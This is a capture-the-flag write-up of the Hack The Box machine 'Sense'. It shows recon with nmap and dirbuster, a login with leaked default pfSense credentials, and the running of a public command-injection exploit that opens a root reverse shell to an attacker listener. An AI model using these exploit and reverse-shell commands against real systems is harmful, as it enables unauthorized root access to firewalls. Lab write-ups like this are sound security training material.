Contents

🕵 HTB-Writeup : SENSE

Recon

nmap

1
2
3
4
5
└─$ nmap -timing 5 -Pn -p- 10.10.10.60

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Try default pfsense credentials on the login page (https://10.10.10.60/index.php):

  • Admin:pfsense
  • root:pfsense

Not working.

dirbuster

drawing

Result of the dirbuster scan

We can found a changelog file on https://10[.]10[.]10[.]60/changelog.txt leaking informations on 3 vulnerabilities on the system. Only two have been patched.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

Visiting https://10[.]10[.]10[.]60/system-users.txt we found a support ticket referencing a user creation.

1
2
3
4
5
6
####Support ticket###

Please create the following user

username: Rohit
password: company defaults

We get a first user Rohit, the password is the “company defaults. Let’s try to connect with the pfsense default password rohit:pfsense

drawing

We are connected to the dashboard !

Vulnerabilities

Connected to the dashboard we can see that the version 2.1.3 of pfsense is installed. Running a searchsploit we found a python exploit.

1
2
3
4
5
6
7
└─$ searchsploit pfsense 2.1  
----------------------------------------------------------------|---------------------------------
 Exploit Title                                                  |  Path
----------------------------------------------------------------|---------------------------------
pfSense 2.1 build 20130911-1816 - Directory Traversal           | php/webapps/31263.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection  | php/webapps/43560.py
----------------------------------------------------------------|---------------------------------

The script is exploiting a vulnerability on status_rrd_graph_img.php page (https://10[.]10[.]10[.]60/status_rrd_graph_img.php). A non-privilegied authenticated attacker can inject arbitrary operating system commands and execute them as root.

We pass all the necessary arguments to the script and execute it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
└─$ python3 /usr/share/exploitdb/exploits/php/webapps/43560.py --rhost 10.10.10.60 --lhost <myIP> --lport 4444 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed

└─$ nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [myIP] from (UNKNOWN) [10.10.10.60] 1391
sh: can't access tty; job control turned off
# whoami
root

We get a root reverse shell ! We can get both flags :)

Tags

FreeBSD, Easy, External, LightHTTPD, PHP, Penetration Tester Level 1, Remote Code Execution, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Pfsense